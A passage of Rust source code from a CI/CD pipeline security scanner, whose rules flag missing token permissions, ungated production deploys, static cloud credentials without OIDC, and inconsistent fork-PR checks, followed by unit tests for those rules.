6107                if e.kind == EdgeKind::HasAccessTo
6108                    && graph
6109                        .node(e.to)
6110                        .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6111                        .unwrap_or(false)
6112                    && !nodes_involved.contains(&e.to)
6113                {
6114                    nodes_involved.push(e.to);
6115                }
6116            }
6117        }
6118
6119        findings.push(Finding {
6120            severity: Severity::Critical,
6121            category: FindingCategory::SecretViaEnvGateToUntrustedConsumer,
6122            path: None,
6123            nodes_involved,
6124            message: format!(
6125                "Untrusted consumer '{}' in job '{}' reads from $GITHUB_ENV after step(s) [{}] laundered authority [{}] through the env gate — secret reaches untrusted code without ever appearing in a HasAccessTo edge",
6126                consumer.name,
6127                consumer_job,
6128                writer_names.join(", "),
6129                secret_labels.join(", "),
6130            ),
6131            recommendation: Recommendation::Manual {
6132                action: "Pass the secret to the consuming step via an explicit `env:` mapping on that step (so the relationship is graph-visible) instead of writing it to `$GITHUB_ENV` for ambient pickup. If the consumer is a third-party action, pin it to a 40-char SHA before exposing any secret-derived value to it.".into(),
6133            },
6134            source: FindingSource::BuiltIn,
6135            extras: FindingExtras::default(),
6136        });
6137    }
6138
6139    findings
6140}
6141
6142// ── Positive invariants (negative-space rules) ───────────────────
6143//
6144// These rules fire on the ABSENCE of an expected defensive control rather
6145// than on the presence of a misconfigured one. They are derived from the
6146// blue-team corpus defense report — patterns observed across thousands of
6147// pipelines where the well-defended workflows had a control the others were
6148// missing.
6149//
6150// Each function gates strictly on `META_PLATFORM` so a single pipeline file
6151// is only evaluated by the rules that apply to its source platform.
6152
6153/// Returns true when a graph belongs to the named platform. Falls back to
6154/// false (rule no-ops) when no platform stamp is present — keeps existing
6155/// hand-built test graphs from accidentally tripping platform-scoped rules.
6156fn graph_is_platform(graph: &AuthorityGraph, platform: &str) -> bool {
6157    graph
6158        .metadata
6159        .get(META_PLATFORM)
6160        .map(|p| p == platform)
6161        .unwrap_or(false)
6162}
6163
6164/// Rule: GHA workflow declares no top-level `permissions:` block AND no
6165/// per-job permissions block. With nothing declared, `GITHUB_TOKEN` falls
6166/// back to the broad platform default (`contents: write`, `packages: write`,
6167/// metadata read, etc.) on every trigger. Explicit declarations make the
6168/// blast radius legible to the next reviewer; absence makes it invisible.
6169///
6170/// Detection:
6171///   * `META_PLATFORM == "github-actions"` (gates ADO/GitLab out)
6172///   * Graph carries `META_NO_WORKFLOW_PERMISSIONS == "true"` (parser-set
6173///     when `workflow.permissions` is absent)
6174///   * No Identity node whose name starts with `GITHUB_TOKEN (` (those are
6175///     the per-job override identities the parser creates when a job
6176///     declares its own permissions block)
6177///
6178/// Severity: Medium. Not a direct exploit path on its own but compounds
6179/// every other finding in the same workflow.
6180pub fn no_workflow_level_permissions_block(graph: &AuthorityGraph) -> Vec<Finding> {
6181    if !graph_is_platform(graph, "github-actions") {
6182        return Vec::new();
6183    }
6184    let no_workflow_perms = graph
6185        .metadata
6186        .get(META_NO_WORKFLOW_PERMISSIONS)
6187        .map(|v| v == "true")
6188        .unwrap_or(false);
6189    if !no_workflow_perms {
6190        return Vec::new();
6191    }
6192    // Empty graphs (variable-only YAML files mis-detected as GHA, parse
6193    // failures that left the graph empty, etc.) carry no real authority
6194    // surface to be over-broad over. Skip them. A real workflow always
6195    // produces at least one Step node.
6196    if graph.nodes_of_kind(NodeKind::Step).next().is_none() {
6197        return Vec::new();
6198    }
6199    // Per-job permissions blocks create Identity nodes named
6200    // `GITHUB_TOKEN (<job_name>)`. If any exists, the workflow has at least
6201    // one job-scoped permissions block — don't fire.
6202    let has_job_level_perms = graph.nodes_of_kind(NodeKind::Identity).any(|n| {
6203        n.name.starts_with("GITHUB_TOKEN (")
6204            || (n.name == "GITHUB_TOKEN" && n.metadata.contains_key(META_PERMISSIONS))
6205    });
6206    if has_job_level_perms {
6207        return Vec::new();
6208    }
6209    vec![Finding {
6210        severity: Severity::Medium,
6211        category: FindingCategory::NoWorkflowLevelPermissionsBlock,
6212        path: None,
6213        nodes_involved: Vec::new(),
6214        message: "Workflow declares no top-level or per-job `permissions:` block — GITHUB_TOKEN \
6215             falls back to the broad platform default (contents: write, packages: write, …) \
6216             on every trigger. Explicit permissions make the blast radius legible to triage."
6217            .into(),
6218        recommendation: Recommendation::ReducePermissions {
6219            current: "platform default (broad)".into(),
6220            minimum: "permissions: {} at top level, then add the minimum per-job — e.g. \
6221                      `permissions: { contents: read }`"
6222                .into(),
6223        },
6224        source: FindingSource::BuiltIn,
6225        extras: FindingExtras::default(),
6226    }]
6227}
6228
6229/// Rule: ADO job referencing a production-named service connection has no
6230/// `environment:` binding. Strictly broader than
6231/// `terraform_auto_approve_in_prod` — fires on any prod-SC step (Terraform,
6232/// ARM, AzureCLI, AzurePowerShell, custom) whose enclosing job lacks the
6233/// approval gate, regardless of whether `-auto-approve` is set.
6234///
6235/// Detection (per Step):
6236///   * `META_PLATFORM == "azure-devops"`
6237///   * Step carries `META_SERVICE_CONNECTION_NAME` matching prod pattern,
6238///     OR an `Identity` connected via `HasAccessTo` whose name matches
6239///     the same pattern AND carries `META_SERVICE_CONNECTION == "true"`.
6240///   * Step does NOT carry `META_ENV_APPROVAL` (parser tags every step
6241///     inside an environment-bound deployment job).
6242///
6243/// One finding per matching step (matching `terraform_auto_approve_in_prod`
6244/// granularity). Severity: High.
6245pub fn prod_deploy_job_no_environment_gate(graph: &AuthorityGraph) -> Vec<Finding> {
6246    if !graph_is_platform(graph, "azure-devops") {
6247        return Vec::new();
6248    }
6249    let mut findings = Vec::new();
6250    for step in graph.nodes_of_kind(NodeKind::Step) {
6251        let env_gated = step
6252            .metadata
6253            .get(META_ENV_APPROVAL)
6254            .map(|v| v == "true")
6255            .unwrap_or(false);
6256        if env_gated {
6257            continue;
6258        }
6259        let direct = step.metadata.get(META_SERVICE_CONNECTION_NAME).cloned();
6260        let edge_conn = graph
6261            .edges_from(step.id)
6262            .filter(|e| e.kind == EdgeKind::HasAccessTo)
6263            .filter_map(|e| graph.node(e.to))
6264            .find(|n| {
6265                n.kind == NodeKind::Identity
6266                    && n.metadata
6267                        .get(META_SERVICE_CONNECTION)
6268                        .map(|v| v == "true")
6269                        .unwrap_or(false)
6270            })
6271            .map(|n| n.name.clone());
6272        let conn_name = match direct.or(edge_conn) {
6273            Some(n) if looks_like_prod_connection(&n) => n,
6274            _ => continue,
6275        };
6276        findings.push(Finding {
6277            severity: Severity::High,
6278            category: FindingCategory::ProdDeployJobNoEnvironmentGate,
6279            path: None,
6280            nodes_involved: vec![step.id],
6281            message: format!(
6282                "Step '{}' targets production service connection '{}' but its job has no \
6283                 `environment:` binding — every pipeline trigger applies changes with no \
6284                 approval queue and no entry in the ADO Environments audit trail",
6285                step.name, conn_name
6286            ),
6287            recommendation: Recommendation::Manual {
6288                action: "Move the step into a deployment job whose `environment:` is configured \
6289                         with required approvers in ADO. Even if `-auto-approve` is acceptable \
6290                         (e.g. `terraform apply tfplan`), the environment binding gives the \
6291                         platform a chokepoint for approvals, audit, and concurrency limits."
6292                    .into(),
6293            },
6294            source: FindingSource::BuiltIn,
6295            extras: FindingExtras::default(),
6296        });
6297    }
6298    findings
6299}
6300
6301/// Rule: long-lived static credential in scope but the graph has no OIDC
6302/// identity. Advisory uplift on top of `long_lived_credential` that wires
6303/// the existing `Recommendation::FederateIdentity` variant — emits one Info
6304/// finding per static credential whose name suggests a cloud provider that
6305/// supports OIDC (AWS / GCP / Azure).
6306///
6307/// Heuristic: AWS / GCP / Azure tokens usually carry the provider name in
6308/// the variable identifier (`AWS_*`, `GCP_*`, `GCLOUD_*`, `GOOGLE_*`,
6309/// `AZURE_*`, `ARM_*`). When such a name appears AND no OIDC identity
6310/// exists in the graph, the migration to federation is the actionable
6311/// remediation. The recommendation enum has carried `FederateIdentity` for
6312/// two releases without any rule emitting it.
6313///
6314/// Severity: Info (advisory). The underlying credential is already flagged
6315/// at higher severity by `long_lived_credential`.
6316pub fn long_lived_secret_without_oidc_recommendation(graph: &AuthorityGraph) -> Vec<Finding> {
6317    // Skip if any OIDC identity already exists — the workflow is already on
6318    // a federated path; the static credential it carries is presumably a
6319    // legacy artifact unrelated to the OIDC integration.
6320    let has_oidc = graph.nodes_of_kind(NodeKind::Identity).any(|n| {
6321        n.metadata
6322            .get(META_OIDC)
6323            .map(|v| v == "true")
6324            .unwrap_or(false)
6325    });
6326    if has_oidc {
6327        return Vec::new();
6328    }
6329    let mut findings = Vec::new();
6330    for secret in graph.nodes_of_kind(NodeKind::Secret) {
6331        let upper = secret.name.to_uppercase();
6332        let provider: Option<(&str, &str)> = if upper.starts_with("AWS_")
6333            || upper.contains("AWS_ACCESS_KEY")
6334            || upper.contains("AWS_SECRET")
6335        {
6336            Some(("AWS", "GitHub Actions OIDC + sts:AssumeRoleWithWebIdentity (id-token: write + aws-actions/configure-aws-credentials)"))
6337        } else if upper.starts_with("GCP_")
6338            || upper.starts_with("GCLOUD_")
6339            || upper.starts_with("GOOGLE_")
6340            || upper.contains("GCP_SERVICE_ACCOUNT")
6341            || upper.contains("GOOGLE_CREDENTIALS")
6342        {
6343            Some(("GCP", "GCP Workload Identity Federation (google-github-actions/auth with workload_identity_provider)"))
6344        } else if upper.starts_with("AZURE_")
6345            || upper.starts_with("ARM_")
6346            || upper.contains("AZURE_CLIENT_SECRET")
6347        {
6348            Some((
6349                "Azure",
6350                "Azure federated credential (azure/login with client-id, no client-secret)",
6351            ))
6352        } else {
6353            None
6354        };
6355        let Some((cloud, oidc_provider)) = provider else {
6356            continue;
6357        };
6358        findings.push(Finding {
6359            severity: Severity::Info,
6360            category: FindingCategory::LongLivedSecretWithoutOidcRecommendation,
6361            path: None,
6362            nodes_involved: vec![secret.id],
6363            message: format!(
6364                "Long-lived {cloud} credential '{}' is in scope and no OIDC identity exists \
6365                 in this workflow — {cloud} supports OIDC federation, so this credential could \
6366                 be replaced with a short-lived token issued at runtime",
6367                secret.name
6368            ),
6369            recommendation: Recommendation::FederateIdentity {
6370                static_secret: secret.name.clone(),
6371                oidc_provider: oidc_provider.into(),
6372            },
6373            source: FindingSource::BuiltIn,
6374            extras: FindingExtras::default(),
6375        });
6376    }
6377    findings
6378}
6379
6380/// Rule: GHA workflow with multiple privileged jobs where SOME steps carry
6381/// the standard fork-check `if:` and OTHERS do not — intra-file
6382/// inconsistency in defensive posture. The org has the right instinct
6383/// (some jobs are guarded) but applied it unevenly. Surfaces the unguarded
6384/// privileged jobs by name so a reviewer can fix the gap in one PR.
6385///
6386/// Detection:
6387///   * `META_PLATFORM == "github-actions"`
6388///   * Trigger contains `pull_request` or `pull_request_target`
6389///   * Multiple jobs hold authority (steps with `HasAccessTo` to a Secret
6390///     or Identity)
6391///   * At least one such job's privileged steps ALL carry
6392///     `META_FORK_CHECK == "true"`
6393///   * AND at least one OTHER privileged job has NO step carrying that
6394///     marker
6395///
6396/// Severity: High. Severity floors at Medium when the inconsistency is
6397/// limited to a single unguarded job (one-off oversight) vs. multiple
6398/// (systemic gap).
6399pub fn pull_request_workflow_inconsistent_fork_check(graph: &AuthorityGraph) -> Vec<Finding> {
6400    if !graph_is_platform(graph, "github-actions") {
6401        return Vec::new();
6402    }
6403    let trigger = match graph.metadata.get(META_TRIGGER) {
6404        Some(t) => t.as_str(),
6405        None => return Vec::new(),
6406    };
6407    let in_pr_context = trigger.split(',').any(|t| {
6408        let t = t.trim();
6409        matches!(t, "pull_request" | "pull_request_target")
6410    });
6411    if !in_pr_context {
6412        return Vec::new();
6413    }
6414
6415    // For each privileged step, record (job_name, has_fork_check). A job is
6416    // "guarded" iff every privileged step in it carries the marker.
6417    use std::collections::BTreeMap;
6418    let mut per_job: BTreeMap<String, (bool, bool)> = BTreeMap::new(); // job -> (any_guarded, any_unguarded)
6419
6420    for step in graph.nodes_of_kind(NodeKind::Step) {
6421        let holds_authority = graph.edges_from(step.id).any(|e| {
6422            e.kind == EdgeKind::HasAccessTo
6423                && graph
6424                    .node(e.to)
6425                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6426                    .unwrap_or(false)
6427        });
6428        if !holds_authority {
6429            continue;
6430        }
6431        let job = step
6432            .metadata
6433            .get(META_JOB_NAME)
6434            .cloned()
6435            .unwrap_or_else(|| step.name.clone());
6436        let guarded = step
6437            .metadata
6438            .get(META_FORK_CHECK)
6439            .map(|v| v == "true")
6440            .unwrap_or(false);
6441        let entry = per_job.entry(job).or_insert((false, false));
6442        if guarded {
6443            entry.0 = true;
6444        } else {
6445            entry.1 = true;
6446        }
6447    }
6448
6449    // Need >= 2 distinct privileged jobs; >= 1 fully-guarded job and >= 1
6450    // job with at least one unguarded privileged step.
6451    if per_job.len() < 2 {
6452        return Vec::new();
6453    }
6454    let fully_guarded: Vec<&String> = per_job
6455        .iter()
6456        .filter(|(_, (g, u))| *g && !*u)
6457        .map(|(k, _)| k)
6458        .collect();
6459    let unguarded: Vec<&String> = per_job
6460        .iter()
6461        .filter(|(_, (_, u))| *u)
6462        .map(|(k, _)| k)
6463        .collect();
6464    if fully_guarded.is_empty() || unguarded.is_empty() {
6465        return Vec::new();
6466    }
6467    let severity = if unguarded.len() >= 2 {
6468        Severity::High
6469    } else {
6470        Severity::Medium
6471    };
6472    let guarded_label = fully_guarded
6473        .iter()
6474        .map(|s| s.as_str())
6475        .collect::<Vec<_>>()
6476        .join(", ");
6477    let unguarded_label = unguarded
6478        .iter()
6479        .map(|s| s.as_str())
6480        .collect::<Vec<_>>()
6481        .join(", ");
6482    vec![Finding {
6483        severity,
6484        category: FindingCategory::PullRequestWorkflowInconsistentForkCheck,
6485        path: None,
6486        nodes_involved: Vec::new(),
6487        message: format!(
6488            "PR-triggered workflow ('{trigger}') applies the standard fork-check \
6489             (`github.event.pull_request.head.repo.fork == false` or equivalent) on \
6490             privileged jobs [{guarded_label}] but NOT on [{unguarded_label}] — the \
6491             unguarded jobs hold authority that fork PRs can reach"
6492        ),
6493        recommendation: Recommendation::Manual {
6494            action: format!(
6495                "Add `if: github.event.pull_request.head.repo.fork == false` (or \
6496                 `github.event.pull_request.head.repo.full_name == github.repository`) to the \
6497                 privileged steps in [{unguarded_label}]. Match the pattern already used by \
6498                 [{guarded_label}] in the same workflow."
6499            ),
6500        },
6501        source: FindingSource::BuiltIn,
6502        extras: FindingExtras::default(),
6503    }]
6504}
6505
6506/// Rule: GitLab job with a production-named `environment:` binding has no
6507/// `rules:` / `only:` clause restricting it to protected branches. The job
6508/// runs (or attempts to run) on every pipeline trigger; if branch
6509/// protection is later relaxed the deploy becomes runnable from
6510/// unprotected branches without any code change.
6511///
6512/// Detection (per Step in a GitLab graph):
6513///   * `META_PLATFORM == "gitlab"`
6514///   * Step carries `environment_name` matching a production token
6515///     (`prod`, `production`, `prd`)
6516///   * Step does NOT carry `META_RULES_PROTECTED_ONLY`
6517///
6518/// Severity: Medium.
6519pub fn gitlab_deploy_job_missing_protected_branch_only(graph: &AuthorityGraph) -> Vec<Finding> {
6520    if !graph_is_platform(graph, "gitlab") {
6521        return Vec::new();
6522    }
6523    let mut findings = Vec::new();
6524    for step in graph.nodes_of_kind(NodeKind::Step) {
6525        let env_name = match step.metadata.get("environment_name") {
6526            Some(n) => n.clone(),
6527            None => continue,
6528        };
6529        if !looks_like_prod_connection(&env_name) {
6530            continue;
6531        }
6532        let protected = step
6533            .metadata
6534            .get(META_RULES_PROTECTED_ONLY)
6535            .map(|v| v == "true")
6536            .unwrap_or(false);
6537        if protected {
6538            continue;
6539        }
6540        findings.push(Finding {
6541            severity: Severity::Medium,
6542            category: FindingCategory::GitlabDeployJobMissingProtectedBranchOnly,
6543            path: None,
6544            nodes_involved: vec![step.id],
6545            message: format!(
6546                "GitLab deploy job '{}' targets production environment '{}' but has no \
6547                 `rules:` / `only:` clause restricting it to protected branches — every MR \
6548                 and every push will attempt to run the deploy",
6549                step.name, env_name
6550            ),
6551            recommendation: Recommendation::Manual {
6552                action: "Add `rules: - if: '$CI_COMMIT_REF_PROTECTED == \"true\"'` to the job, \
6553                         or `only: [main]` for the simplest case. This survives future \
6554                         changes to branch-protection settings."
6555                    .into(),
6556            },
6557            source: FindingSource::BuiltIn,
6558            extras: FindingExtras::default(),
6559        });
6560    }
6561    findings
6562}
6563
6564// ── Compensating-control suppressions ────────────────────────
6565//
6566// These suppressions DOWNGRADE or REMOVE existing-rule findings when the
6567// graph carries a control that neutralises (or substantially mitigates)
6568// the underlying risk. Applied as a post-processing pass so each
6569// suppression can see both the finding and the surrounding graph state.
6570//
6571// Design intent (from the blue-team corpus defense report):
6572//   * downgrade > suppress: keep the finding visible at a lower severity
6573//     so it still surfaces in audits, but stop competing for triage time
6574//     with un-mitigated criticals
6575//   * never *delete* a finding silently — every suppression appends an
6576//     explanation suffix to the message describing the compensating
6577//     control taudit credited
6578//
6579// Suppressions implemented here:
6580//   1. `checkout_self_pr_exposure` downgraded when the same job has no
6581//      privileged steps (no Secret/Identity access and no env-gate writes).
6582//   2. `trigger_context_mismatch` downgraded when every privileged step
6583//      in the workflow carries the standard fork-check `if:`.
6584//   3. `over_privileged_identity` suppressed when the workflow-level
6585//      identity is broad but at least one job-level override narrows the
6586//      scope (job-level wins at runtime).
6587//   4. `terraform_auto_approve_in_prod` downgraded — not skipped — when an
6588//      `environment:` gate is present (replaces the previous early-skip
6589//      which discarded the finding entirely).
6590fn apply_compensating_controls(graph: &AuthorityGraph, findings: &mut [Finding]) {
6591    // Pre-compute graph-level signals once so the per-finding loop stays
6592    // O(N findings) rather than O(N findings × M nodes).
6593    let mut all_authority_steps_have_fork_check = true;
6594    let mut any_authority_step_seen = false;
6595    for step in graph.nodes_of_kind(NodeKind::Step) {
6596        let holds_authority = graph.edges_from(step.id).any(|e| {
6597            e.kind == EdgeKind::HasAccessTo
6598                && graph
6599                    .node(e.to)
6600                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6601                    .unwrap_or(false)
6602        });
6603        if !holds_authority {
6604            continue;
6605        }
6606        any_authority_step_seen = true;
6607        let guarded = step
6608            .metadata
6609            .get(META_FORK_CHECK)
6610            .map(|v| v == "true")
6611            .unwrap_or(false);
6612        if !guarded {
6613            all_authority_steps_have_fork_check = false;
6614        }
6615    }
6616    let fork_check_universal = any_authority_step_seen && all_authority_steps_have_fork_check;
6617
6618    // For Suppression 1, build per-job: does any step in the job have
6619    // access to a Secret/Identity OR write to the env gate?
6620    use std::collections::{BTreeMap, BTreeSet};
6621    let mut job_has_privileged_step: BTreeMap<String, bool> = BTreeMap::new();
6622    for step in graph.nodes_of_kind(NodeKind::Step) {
6623        let job = match step.metadata.get(META_JOB_NAME) {
6624            Some(j) => j.clone(),
6625            None => continue,
6626        };
6627        let privileged = graph.edges_from(step.id).any(|e| {
6628            e.kind == EdgeKind::HasAccessTo
6629                && graph
6630                    .node(e.to)
6631                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6632                    .unwrap_or(false)
6633        }) || step
6634            .metadata
6635            .get(META_WRITES_ENV_GATE)
6636            .map(|v| v == "true")
6637            .unwrap_or(false);
6638        let entry = job_has_privileged_step.entry(job).or_insert(false);
6639        if privileged {
6640            *entry = true;
6641        }
6642    }
6643
6644    // For Suppression 3 — over_privileged_identity — collect the names of
6645    // narrower per-job identity overrides so we can credit them when the
6646    // broad workflow-level identity fires.
6647    let job_level_narrow_overrides: BTreeSet<String> = graph
6648        .nodes_of_kind(NodeKind::Identity)
6649        .filter(|n| {
6650            n.name.starts_with("GITHUB_TOKEN (")
6651                && n.metadata
6652                    .get(META_IDENTITY_SCOPE)
6653                    .map(|s| s == "constrained")
6654                    .unwrap_or(false)
6655        })
6656        .map(|n| n.name.clone())
6657        .collect();
6658
6659    for finding in findings.iter_mut() {
6660        match finding.category {
6661            // ── Suppression 1: checkout_self_pr_exposure
6662            FindingCategory::CheckoutSelfPrExposure => {
6663                // Identify the checkout step (first node in nodes_involved)
6664                // and look up its job. If the job has no privileged steps,
6665                // the checkout is read-only — downgrade to Info.
6666                let job = finding
6667                    .nodes_involved
6668                    .first()
6669                    .and_then(|id| graph.node(*id))
6670                    .and_then(|n| n.metadata.get(META_JOB_NAME).cloned());
6671                let job_privileged = job
6672                    .as_ref()
6673                    .and_then(|j| job_has_privileged_step.get(j).copied())
6674                    .unwrap_or(true); // unknown → conservative: keep High
6675                if !job_privileged {
6676                    finding.severity = Severity::Info;
6677                    finding.message.push_str(
6678                        " (downgraded: no privileged steps in same job — \
6679                                   checkout is read-only for lint/test/analysis)",
6680                    );
6681                }
6682            }
6683            // ── Suppression 2: trigger_context_mismatch
6684            FindingCategory::TriggerContextMismatch => {
6685                if fork_check_universal {
6686                    // Critical → Medium (not Info — the trigger choice itself
6687                    // is still risky enough to keep visible for audit).
6688                    finding.severity = match finding.severity {
6689                        Severity::Critical => Severity::Medium,
6690                        s => downgrade_one_step(s),
6691                    };
6692                    finding.message.push_str(
6693                        " (downgraded: every privileged job in this workflow carries the \
6694                         standard fork-check `if:` — fork PRs cannot reach the privileged steps)",
6695                    );
6696                }
6697            }
6698            // ── Suppression 3: over_privileged_identity
6699            FindingCategory::OverPrivilegedIdentity => {
6700                // Only relevant when the firing identity IS the
6701                // workflow-level GITHUB_TOKEN AND at least one job has its
6702                // own narrower override.
6703                let firing_node_name = finding
6704                    .nodes_involved
6705                    .first()
6706                    .and_then(|id| graph.node(*id))
6707                    .map(|n| n.name.clone());
6708                let is_workflow_level_token = firing_node_name.as_deref() == Some("GITHUB_TOKEN");
6709                if is_workflow_level_token && !job_level_narrow_overrides.is_empty() {
6710                    // Suppress by reducing to Info — the runtime identity
6711                    // any job actually uses is the narrower job-level one.
6712                    finding.severity = Severity::Info;
6713                    let mut narrower: Vec<&str> = job_level_narrow_overrides
6714                        .iter()
6715                        .map(|s| s.as_str())
6716                        .collect();
6717                    narrower.sort_unstable();
6718                    finding.message.push_str(&format!(
6719                        " (suppressed: job-level permissions narrow this scope at runtime — \
6720                         see {})",
6721                        narrower.join(", ")
6722                    ));
6723                }
6724            }
6725            // ── Suppression 4: terraform_auto_approve_in_prod
6726            //
6727            // The pre-existing rule already early-skipped
6728            // env-gated steps, so it never emits a finding to downgrade.
6729            // Downgrade is wired into the rule body itself (search for
6730            // `env_gated`) — kept as a no-op match arm here so future
6731            // contributors can find the suppression-pass alongside the
6732            // others.
6733            FindingCategory::TerraformAutoApproveInProd => { /* see rule body */ }
6734            _ => {}
6735        }
6736    }
6737}
6738
6739#[cfg(test)]
6740mod tests {
6741    use super::*;
6742    use crate::graph::*;
6743
6744    fn source(file: &str) -> PipelineSource {
6745        PipelineSource {
6746            file: file.into(),
6747            repo: None,
6748            git_ref: None,
6749            commit_sha: None,
6750        }
6751    }
6752
6753    #[test]
6754    fn unpinned_third_party_action_flagged() {
6755        let mut g = AuthorityGraph::new(source("ci.yml"));
6756        g.add_node(
6757            NodeKind::Image,
6758            "actions/checkout@v4",
6759            TrustZone::ThirdParty,
6760        );
6761
6762        let findings = unpinned_action(&g);
6763        assert_eq!(findings.len(), 1);
6764        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
6765    }
6766
6767    #[test]
6768    fn pinned_action_not_flagged() {
6769        let mut g = AuthorityGraph::new(source("ci.yml"));
6770        g.add_node(
6771            NodeKind::Image,
6772            "actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29",
6773            TrustZone::ThirdParty,
6774        );
6775
6776        let findings = unpinned_action(&g);
6777        assert!(findings.is_empty());
6778    }
6779
6780    #[test]
6781    fn untrusted_step_with_secret_is_critical() {
6782        let mut g = AuthorityGraph::new(source("ci.yml"));
6783        let step = g.add_node(NodeKind::Step, "evil-action", TrustZone::Untrusted);
6784        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
6785        g.add_edge(step, secret, EdgeKind::HasAccessTo);
6786
6787        let findings = untrusted_with_authority(&g);
6788        assert_eq!(findings.len(), 1);
6789        assert_eq!(findings[0].severity, Severity::Critical);
6790    }
6791
6792    #[test]
6793    fn implicit_identity_downgrades_to_info() {
6794        let mut g = AuthorityGraph::new(source("ci.yml"));
6795        let step = g.add_node(NodeKind::Step, "AzureCLI@2", TrustZone::Untrusted);
6796        let mut meta = std::collections::HashMap::new();
6797        meta.insert(META_IMPLICIT.into(), "true".into());
6798        meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
6799        let token = g.add_node_with_metadata(
6800            NodeKind::Identity,
6801            "System.AccessToken",
6802            TrustZone::FirstParty,
6803            meta,
6804        );
6805        g.add_edge(step, token, EdgeKind::HasAccessTo);
6806
6807        let findings = untrusted_with_authority(&g);
6808        assert_eq!(findings.len(), 1);
6809        assert_eq!(
6810            findings[0].severity,
6811            Severity::Info,
6812            "implicit token must be Info not Critical"
6813        );
6814        assert!(findings[0].message.contains("platform-injected"));
6815    }
6816
6817    #[test]
6818    fn explicit_secret_remains_critical_despite_implicit_token() {
6819        let mut g = AuthorityGraph::new(source("ci.yml"));
6820        let step = g.add_node(NodeKind::Step, "AzureCLI@2", TrustZone::Untrusted);
6821        // implicit token → Info
6822        let mut meta = std::collections::HashMap::new();
6823        meta.insert(META_IMPLICIT.into(), "true".into());
6824        let token = g.add_node_with_metadata(
6825            NodeKind::Identity,
6826            "System.AccessToken",
6827            TrustZone::FirstParty,
6828            meta,
6829        );
6830        // explicit secret → Critical
6831        let secret = g.add_node(NodeKind::Secret, "ARM_CLIENT_SECRET", TrustZone::FirstParty);
6832        g.add_edge(step, token, EdgeKind::HasAccessTo);
6833        g.add_edge(step, secret, EdgeKind::HasAccessTo);
6834
6835        let findings = untrusted_with_authority(&g);
6836        assert_eq!(findings.len(), 2);
6837        let info = findings
6838            .iter()
6839            .find(|f| f.severity == Severity::Info)
6840            .unwrap();
6841        let crit = findings
6842            .iter()
6843            .find(|f| f.severity == Severity::Critical)
6844            .unwrap();
6845        assert!(info.message.contains("platform-injected"));
6846        assert!(crit.message.contains("ARM_CLIENT_SECRET"));
6847    }
6848
6849    #[test]
6850    fn artifact_crossing_untrusted_producer_firstparty_consumer_fires() {
6851        // Untrusted producer -> first-party consumer: should fire (poisoned artifact attack)
6852        let mut g = AuthorityGraph::new(source("ci.yml"));
6853        let secret = g.add_node(NodeKind::Secret, "KEY", TrustZone::Untrusted);
6854        let build = g.add_node(NodeKind::Step, "pr-build", TrustZone::Untrusted);
6855        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::Untrusted);
6856        let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
6857
6858        g.add_edge(build, secret, EdgeKind::HasAccessTo);
6859        g.add_edge(build, artifact, EdgeKind::Produces);
6860        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6861
6862        let findings = artifact_boundary_crossing(&g);
6863        assert_eq!(findings.len(), 1);
6864        assert_eq!(
6865            findings[0].category,
6866            FindingCategory::ArtifactBoundaryCrossing
6867        );
6868    }
6869
6870    #[test]
6871    fn artifact_crossing_no_authority_still_fires() {
6872        // The crossing itself is the risk; no HasAccessTo edge required to fire.
6873        let mut g = AuthorityGraph::new(source("ci.yml"));
6874        let build = g.add_node(NodeKind::Step, "pr-build", TrustZone::Untrusted);
6875        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::Untrusted);
6876        let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
6877        // No HasAccessTo edge on the producer — previously this caused the rule to skip.
6878        g.add_edge(build, artifact, EdgeKind::Produces);
6879        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6880        let findings = artifact_boundary_crossing(&g);
6881        assert_eq!(
6882            findings.len(),
6883            1,
6884            "boundary crossing must fire without a producer HasAccessTo edge; got: {findings:#?}"
6885        );
6886        assert_eq!(
6887            findings[0].category,
6888            FindingCategory::ArtifactBoundaryCrossing
6889        );
6890    }
6891
6892    // ── Bug regression: run_all_rules dedup ─────────────────────────────────
6893
6894    #[test]
6895    fn run_all_rules_deduplicates_structurally_identical_findings() {
6896        // Regression for Bug 3: BFS can visit the same (step, secret) pair via
6897        // two distinct graph paths. Both visits produce a finding with identical
6898        // category + nodes_involved + message. run_all_rules must emit exactly
6899        // one copy regardless of path count.
6900        let mut g = AuthorityGraph::new(source("ci.yml"));
6901        g.metadata
6902            .insert(META_PLATFORM.into(), "azure-devops".into());
6903        let secret = g.add_node(NodeKind::Secret, "MY_SECRET", TrustZone::FirstParty);
6904        let intermediate = g.add_node(NodeKind::Step, "middle-step", TrustZone::FirstParty);
6905        let sink = g.add_node(NodeKind::Step, "sink-step", TrustZone::Untrusted);
6906
6907        // Two paths from secret → sink: direct and via intermediate.
6908        g.add_edge(sink, secret, EdgeKind::HasAccessTo);
6909        g.add_edge(intermediate, secret, EdgeKind::HasAccessTo);
6910        g.add_edge(sink, intermediate, EdgeKind::HasAccessTo);
6911
6912        let findings = run_all_rules(&g, 4);
6913
6914        // Count findings whose nodes_involved contain the sink step.
6915        let sink_findings: Vec<_> = findings
6916            .iter()
6917            .filter(|f| f.nodes_involved.contains(&sink))
6918            .filter(|f| f.nodes_involved.contains(&secret))
6919            .collect();
6920
6921        // Regardless of path count through the graph, each unique
6922        // (category, nodes, message) triple must appear at most once.
6923        let unique_messages: std::collections::HashSet<_> =
6924            sink_findings.iter().map(|f| &f.message).collect();
6925        assert_eq!(
6926            sink_findings.len(),
6927            unique_messages.len(),
6928            "duplicate findings must be deduplicated; got: {findings:#?}"
6929        );
6930    }
6931
6932    #[test]
6933    fn artifact_crossing_same_job_does_not_fire() {
6934        // Upload and download in the same job is a legitimate temp-file pattern.
6935        // META_JOB_NAME guard must suppress the finding.
6936        let mut g = AuthorityGraph::new(source("ci.yml"));
6937        let build = g.add_node_with_metadata(
6938            NodeKind::Step,
